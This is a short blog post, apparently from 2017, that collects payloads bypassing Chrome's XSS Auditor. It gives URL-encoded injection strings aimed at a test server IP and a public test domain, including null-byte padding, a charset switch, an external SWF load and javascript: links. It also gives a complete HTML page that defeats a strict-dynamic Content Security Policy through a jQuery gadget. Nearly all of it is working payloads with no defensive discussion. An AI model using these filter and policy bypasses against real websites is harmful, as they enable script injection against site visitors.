Chrome XSS Auditor Bypass Payload
langu_xyz
 2017-05-22 21:00:00      296 Words  1 Mins

测试版本:

测试环境:

===============================

不需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

CSP bypass via jQuery Gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';">
<script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script>
<script nonce=random>
$(document).ready(function(){
    // code taken from http://api.jquery.com/after/
    $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
XSS XSS XSS
<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>
XSS XSS XSS
<p class="container"></p>
</body>
</html>

需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C

  • Post title:Chrome XSS Auditor Bypass Payload
  • Post author:langu_xyz
  • Create time:2017-05-22 21:00:00
  • Post link:https://blog.langu.xyz/Chrome XSS Auditor Bypass Payload/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.